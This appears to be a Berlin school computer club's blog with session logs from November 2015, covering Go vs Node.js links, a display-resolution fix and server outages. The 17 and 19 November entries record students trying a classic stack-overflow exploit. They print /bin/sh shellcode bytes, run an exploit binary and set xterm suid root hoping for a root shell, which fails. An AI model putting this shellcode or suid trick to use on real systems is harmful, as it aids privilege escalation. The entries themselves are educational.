Computer-Ag am WvS Blog der Computer-AG am Werner von Siemens Gymnasium Berlin

26. November 2015

26.11.2015

Johannes, Angelo und Morten sind da. Johannes berichtet von der High-Deck-Siedlung. Angelo hat das neue Go-Buch von Addison-Wesley dabei.

Man kann mit Go auch Apps für Android und iOS programmieren. Auf reddit fragt einer nach den Vorteile von Go, etwa im Mai 2015. Auf thenewstack.io wird eine Firma beschrieben, die von Node.js zu Go gewechselt hat. Auf hostingadvice.com gibt es eine Diskussions Node.js vs. Golang. Darin ein Verweis auf kickstarter und Probleme mit Go und Haunts.

Es gibt auch gonode. Eine Brücke zwischen Node und Go. Golang hat auch was mit concurrency (=Nebenläufigkeit) zu tun. Auf quora auch ein interessanter Beitrag/Diskussion zu node.js vs. golang. Hier noch kurz was zu Socket.io bei quora. Hier 10 Open Source Projekte mit Golang. Auf Github findet sich eine Liste von Companies/Projekten, die nodejs benutzen.

Nächsten Dienstag und Donnerstag „b.a.u.“ (business as usual).

 

24. November 2015

24.11.2015

Moritz und Morten sind da.

Der Lernserver geht nicht. Er hat offenbar Probleme beim Runterfahren, deshalb musste Herr Oppermann ihn ausschalten.

Morten schafft es, auf Roberts Linux-vom-Stick den VGA-Modus zu ändern und vorher einzutragen:

rob@rob-System-Product-Name:~$ cvt 1920 1080
# 1920×1080 59.96 Hz (CVT 2.07M9) hsync: 67.16 kHz; pclk: 173.00 MHz
Modeline „1920x1080_60.00“  173.00  1920 2048 2248 2576  1080 1083 1088 1120 -hsync +vsync
rob@rob-System-Product-Name:~$ xrandr –newmode „1920x1080_60.00“  173.00  1920 2048 2248 2576  1080 1083 1088 1120 -hsync +vsync
rob@rob-System-Product-Name:~$ xrandr –output VGA-0 –mode 1920x1080_60.00
rob@rob-System-Product-Name:~$

1920×1080 war vorher nämlich nicht verfügbar.

Dell hat auf aktuellen Rechnern ein Root-CA-Certificat, dass Man-in-the-Middle Attacken erlauben würde.

Robert schließt seine Tabs, u.a.:

file:///home/rob/Schreibtisch/lisp.html – file:///home/rob/lisp.html – der LISP-Interpreter mit Angelo programmiert.

s.a. http://html-ag.wvs-berlin.de/lisp.html.

So installiert man Node.js.

Und so nutzt man JSLint unter Linux von der Kommandozeile.

Irgendwann hatten wir mal eine Fritzboxtest über Angelos Server: https://fritztest.papnet.eu/.

Auf dem Lernserver muss es auch im Firefox Tab-Groups geben, auf dem Linux-vom-Stick aber nicht.

Wir suchen uns bei Google und finden uns.

Wir gucken uns eine Codezeile von Git an.

Am Donnerstag AG um 15:00 wieder

 

 

 

 

 

19. November 2015

19.11.2015

Der Exploit läuft zwar irgendwie mit

[aleph1]$ ./exploit4 2148 600
Using address: 0xbffffb54
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG

Aber es bringt nichts. Angelo meint, dass das alles gefixt ist. Wir haben noch xterm kopiert und mit chmod u+s die suid auf root gesetzt. Bringt aber dennoch keine Root-Shell.

Lernserver geht nicht an …;

17. November 2015

17.11.2015

Filed under: Allgemein,Assembler,C,PHP,Tagesberichte,Termine,Tisch — admin @ 16:00

Morten und Martin sind da. Frank Oppermann macht dankenswerter Weise den Lernserver an. Der war beim letzten Mal irgendwie nicht richtig runtergefahren.

Martin liest ein Paper zu Stackoverflow und Exploits (von 1998 vermutlich). Das Ganze funktioniert schlussendlich mit einem Interrupt (0x80).

Morten programmiert mit PHP etwas, was aus zwei ähnlichen Dateien (beide kaputt), aus Datei 2 Bytes an die Stelle von Datei 1 schreibt, wo in Datei 1 ein 0-byte steht. 0x00 in Hex-Code wohl. Sind glaube ich nur 10 Zeilen Code oder so.

Martin kann Donnerstag erst um kurz nach 16:00 hier sein. Eventuell fangen wir dann erst um 15:00 an, wenn Colin und Julian nicht kommen.

Das Komplieren klappt irgendwie nicht. Nachdem ich noch

#include <getopt.h>
#include <string.h>

in eggshell.c eingebaut habe und eggshell.h nach /usr/bin/ld kopiert habe kommt mit

rob@lernserver:~/exploit_test$ gcc eggshell.c -l shellcode.h

eggshell.c: In function ‘main’:
eggshell.c:60:3: warning: format ‘%x’ expects argument of type ‘unsigned int’, but argument 2 has type ‘long int’ [-Wformat]
/usr/bin/ld: 4: /usr/bin/ld: char: not found
/usr/bin/ld: 5: /usr/bin/ld: char: not found
/usr/bin/ld: 6: /usr/bin/ld: \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b: not found
/usr/bin/ld: 7: /usr/bin/ld: \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd: not found
/usr/bin/ld: 8: /usr/bin/ld: \x80\xe8\xdc\xff\xff\xff/bin/sh: not found
/usr/bin/ld: 10: /usr/bin/ld: Syntax error: „(“ unexpected
collect2: ld returned 2 exit status

Donnerstag mehr …;

10. November 2015

10.11.2015

Filed under: Allgemein,Assembler,C,Schulnetzwerk,Tagesberichte,Termine,Tisch — admin @ 17:11

Morten ist da, Martin auch, Moritz und Johannes. Johannes will was mit App-Programmierung machen. Martin hat dazu ein Script (für seinen Kurs im letzten Jahr), den er mit einem Google-Drive-Link an uns alle verschickt hat. Er hat auch zwei Bücher dazu, die er mal mitbringen würde. Wir quatschen kurz über eine Studienaufgabe von Martin, mit C und read, write, open und close einen Papierkorb zu programmiern und ich (Robert) frage mich, ob man dazu überhaupt Arbeitsspeicher allozieren muss. Aber read ohne Buffer geht wohl nicht.

Am Donnerstag ist nicht, dafür dann wieder nächsten Dienstag und vermutlich auch nächsten Donnerstag.

5. November 2015

5.11.2015

Filed under: Allgemein,Lernserver,Termine,Tisch — admin @ 17:01

Colin und Leonard sind da, müssen aber früher gehen und könnten dienstags auch. Angelo ist auch da. Frau Spyra haben wir auch gesehen. Der Lernserver hatte sich beim Hochfahren festgefahren. CMOS checksum error. Frau Leder konnte uns an den Server ranlassen. Läuft wieder. Nächste Woche Dienstag und Donnerstag vermutlich.

Powered by WordPress